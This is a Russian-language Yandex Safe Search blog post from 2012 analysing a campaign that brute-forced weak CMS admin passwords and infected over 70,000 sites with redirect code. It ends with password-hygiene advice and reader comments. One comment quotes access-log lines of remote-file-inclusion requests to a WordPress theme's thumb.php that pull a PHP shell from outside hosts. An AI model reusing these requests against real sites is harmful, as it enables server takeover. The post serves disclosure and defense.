Блог о безопасности

Атаки на CMS с использованием слабых паролей

26 июня 2012, 18:38

Довольно часто для проникновения на веб-сервер, на котором установлена CMS, злоумышленники подбирают слишком простые и предсказуемые пароли для доступа к административной панели. Подбор обычно ведётся по спискам часто используемых паролей. Этот способ атаки не требует больших вычислительных ресурсов и не всегда заметен.

В результате CMS полностью попадает под контроль злоумышленника. В некоторых административных панелях CMS можно загрузить свой файл в обход ограничений системы безопасности или изменить существующие файлы – это позволяет выполнить на зараженном сервере свой код и получить контроль над сервером. После этого злоумышленник обычно заражает скрипты CMS вредоносным кодом, с помощью которого перенаправляет пользователей и монетизирует трафик.
 

Период и результаты заражения

Одна из наиболее массовых атак с использованием слабых паролей была зафиксирована службой Безопасный Поиск Яндекса в сентябре 2011 года. В октябре 2011 мы написали о работе вредоносного кода, появлявшегося на заражённых сайтах, в статье «Вредоносный редиректор на osa.pl». Но тогда у нас не было полной уверенности в способах заражения самих сайтов, и хотя первая же рекомендация – сменить пароли – была верной, система злоумышленников продолжала работать. Взлом сайтов и заражение пользователей продолжались до начала июня 2012 года.

По данным Яндекса, на 20 июня 2012 года в общей сложности от такой атаки пострадало более 70 тыс. веб-сайтов и, по меньшей мере, 1 млн. пользователей. По нашим оценкам, злоумышленники, взламывавшие веб-серверы, успели заработать несколько десятков тысяч долларов, а владельцы вредоносных партнёрских сетей, бэкдоров и ботов, установленных на компьютерах пользователей, – на порядок больше.
Большинство сайтов, подвергшихся заражению, использовали CMS Joomla и CMS WordPress, хотя в этом случае «виновата» не столько CMS, сколько слабый пароль.

Атака, взлом и заражение веб-серверов


Схема атаки и заражения веб-серверов представлена на рис. 1.

 

Рис. 1 – Схема взлома CMS с использованием слабых паролей.



Сначала злоумышленники получали списки популярных сайтов из открытых источников.

Затем они запускали скрипт, предназначенный для определения конкретных CMS. Скрипт злоумышленников умел определять широкий спектр различных CMS, а именно:

  • b2evolution
  • bitrix
  • cmsmadesimple
  • concrete5
  • cotonti
  • dotclear
  • drupal
  • e107
  • ezpublish

  • geeklog
  • impresscms
  • joomla
  • jumbo
  • mediawiki
  • nucleus
  • osc
  • phpfusion
  • pivotx

  • serendipity
  • silverstripe
  • spip
  • tikiwiki
  • typo3
  • wordpress
  • xoops



На основе данных о CMS сайтов злоумышленники готовили список адресов и типов административных панелей, загружали его на сервер, который использовался для брутфорс-атаки, и запускали атакующий скрипт (1).

Все успешно подобранные пароли к административным панелям CMS отправлялись на другой сервер злоумышленников (2), откуда их забирал скрипт, задачей которого был автоматический вход в административную панель CMS и заражение файлов вредоносным кодом (3,4,5).

При заражении скриптов в них добавлялся код, который перенаправлял пользователей, посетивших сайт, на TDS злоумышленников (6).

Распространение и монетизация вредоносного ПО

Схема дальнейшей работы и монетизации вредоносного ПО представлена на рис. 2.


Рис.2 – Схема распространения вредоносного ПО через атакованные CMS с использованием слабых паролей.


При попытке посещения зараженного сайта из результатов поиска пользователь перенаправлялся на сервер злоумышленников.

Пользователи, которые переходили на зараженный сайт из результатов поиска поисковых систем, перенаправлялись на TDS злоумышленников, откуда происходил редирект на серверы, распространяющие вредоносное ПО (1-3-5).

Если TDS злоумышленников определяла, что посетитель зараженного сайта является роботом поисковой системы, то она перенаправляла его на сервер с безвредным содержимым (2-3-4).

Чтобы монетизировать перенаправление пользователей с зараженных ресурсов на серверы, распространяющие вредоносное ПО, злоумышленники регистрировались во вредоносных партнёрских программах, принимающих нужные виды трафика и выдающие адреса серверов (6-7).

В зависимости от типа трафика вредоносные партнёрские программы использовали два типа серверов – распространяющие вредоносные ПО для обычных компьютеров и для мобильных устройств (9, 10).

В результате такая схема давала злоумышленникам возможность монетизации (11,12) своего трафика с зараженных ресурсов.

 
Заключение


Каждый, кто использует слабый пароль, знает, что из-за этого веб-сервер могут взломать. Но очень многие считают, что в реальности с ними этого никогда не произойдёт и предпочитают пользоваться слабым паролем, причём одинаковым везде, и никогда его не менять. Этим и пользуются злоумышленники.

Для защиты от такого вида атак мы рекомендуем вам выставлять сложные пароли на доступ к вашим административным панелям CMS, БД, учётным записям FTP. Если считаете, что придумали хороший пароль – проверьте, не входит ли он в 500 худших. Если хотите придумать сильный пароль, который будет хорошо запоминаться, – возьмите обычное слово и вставьте после некоторых букв цифры и специальные символы.

Сразу после установки CMS переименовывайте скрипты административной панели или директории, в которых они размещены, чтобы избавиться от стандартных и предсказуемых путей, если это, конечно, не нарушит работу самой CMS и представляется возможным. Обязательно удаляйте скрипты начальной установки.

Если у вас есть подозрения, что ваш сайт заражён, или вы не хотите допустить его заражения, то можете воспользоваться рекомендациями по обеспечению безопасности сайта, а также отправить сайт на проверку в панели «Безопасность» Яндекс.Вебмастера. Кроме того, мы регулярно публикуем информацию об актуальных заражениях в блоге Безопасного Поиска Яндекса, следите за обновлениями.

А чтобы интернет оставался для вас безопасным, пользуйтесь сервисами ЯндексаЯндекс.Интернетом и другими хорошо защищенными браузерами.

 

Команда Безопасного Поиска Яндекса

9 комментариев
Подписаться на комментарии к посту

Зависит еще от защиты хостинга. Мне именно туда и залили скрипт, продающий ссылки.

ruslanviktorovich1972
1 июля 2012, 13:52

(+1)

В первых не надо хранить пароли в браузерах. Во вторых по моей статистике изучения паролей 96% пользователей используют пароли типа 11111,12345 итд. Ну и чтоб поломать сайт надо чтоб админ был тупой или не заходил туда пару лет.

Фтп закрыть не долго. Не зря придумали .ftpaccess. И остальное всё перекрыть можно если руки прямые

 

Самая лучшая сохранялка паролей блокнотик. И на флешку )

Неужели кто-то ещё ставит такие слабые пароли?

saunaker К сожалению ставят.  Из 100,000 пользователей. Нормальные пароли имеет только 500-1000 человек. Остальное 1234 итд

Ну кейлоггеры под виндой еще никто не отменял. Т.е. если вы заходите на хостинг или админку, то троян на вашем компе просто ворует пароль и все. Тут никакой супер-хостинг не спасет (.

 

Еще такие фишки:

1. Сделайте максимально сложным автоматическое распознавание типа вашей CMS/CMF. Уберите все стандартные пути, станлартные урлы и т.д.

2. К разделу админки поставьте запрет ходить с любого IP кроме тех, с которых вы сами ходите.Это в htaccess

3. Держите свою CMS/CMF в актуальном состоянии. Дело в том, что уже через полгода по интернет гуляют списки уязвимостей именно вашей версии. Поэтому имеет смысл обновлять или латать движок каждые полгода.

4. Если у вас джумла или вордпресс - замените на нормальный двиг).

 

Как-то так.

Кстати Яша еще нормально относится. У меня один сайт взломали (подсадили г-контент в количестве 3000 страниц, еще и ссылок через sape на него купили). Ну так вот, в яндексе мы не выпали (правда я им экстренно письма писал), а вот гоша выкинул из индекса (((.

Точно сказал про вордресс )) Я тут с неделю уже наблюдаю как мне хотят впарить шелл Запросы катят с сайтов.

188.40.136.5 - - [29/Jul/2012:02:06:40 +0400] "GET /smart/wp-content/themes/geometric/thumb.php?src=http://picasa.communication.mushindojo-bistrita.ro/wp.php
188.40.136.5 - - [29/Jul/2012:02:06:40 +0400] "GET /wp-content/themes/geometric/thumb.php?src=http://picasa.communication.mushindojo-bistrita.ro/wp.php
77.92.150.147 - -[29/Jul/2012:02:16:28 +0400] "GET /smart/wp-content/themes/geometric/thumb.php?src=http://blogger.community.transpackchile.com/wp-login.php

 Только у мене не вордпресс что самое интересное А по ссылкам бяка

https://www.virustotal.com/url/383e7f126988bb79f75572bfc1abc2d0af933704808f315ee971c100248678fc/analysis/

:) А что можно считать нормальным движком?  Писать ручками, предварительно став прошаренным програмистом? 

WP прост для быстрого старта, да и после можно перелопатить его под собственные нужды.

Люди юзают то, что доступно и при этом общаются на понятные друг другу темы. 

Почему бы использовать MODxCMS ? Только юзать имеет смысл ветку 1 (Evolution), т.к. ветка 2 (Revolution) хоть и более крута, но и более ресурсоемка, более сложна и т.д.

 

А так, сайт-каталог на MODX Evolution поднимается очень быстро. Самая долгая часть времени у меня всегда занимается версткой (верстку никому не отдаю, делаю аккуратно блочную). Там админка уже есть своя, весьма удобная, с древовидной организацией страниц. ЧПУ там есть сразу. Настроить генерацию меню - минут 20. Прикрутить сниппет чтобы была выгрузка в sitemap.xml - 20 минут. Прикрутить выгрузку в формат Яндекс.Товары/Маркет - ну часа 3, если все свойства прописывать. Туда вообще все что угодно прикручивается, много фрилансеров, которые за весьма маленькие деньги нормально все настроят или даже допишут програмный модуль. Я сам когда-то написал модуль чтобы прайсы из xls выдавал в html с форматированием и кэшированием.

 

В общем для любых сайтов с каталожной структурой использую MODX. Если же нужна более сложная логика работы с информацией, то использую уже фреймворки, аля CodeIgniter, YII. 

 

Очень хорош Django, но Python-программисты уж больно дорогие, это минус. 

 

А вордпресс это блоговый движок. Писать на нем что либо кроме блогов, - пошло, IMHO.

p.s. Ну так, для примера - сайт www.admis.ru именно на MODX сделан. Много функционала делалось чисто под этот сайт. MODx хорош тем, что проекты легко поддерживать.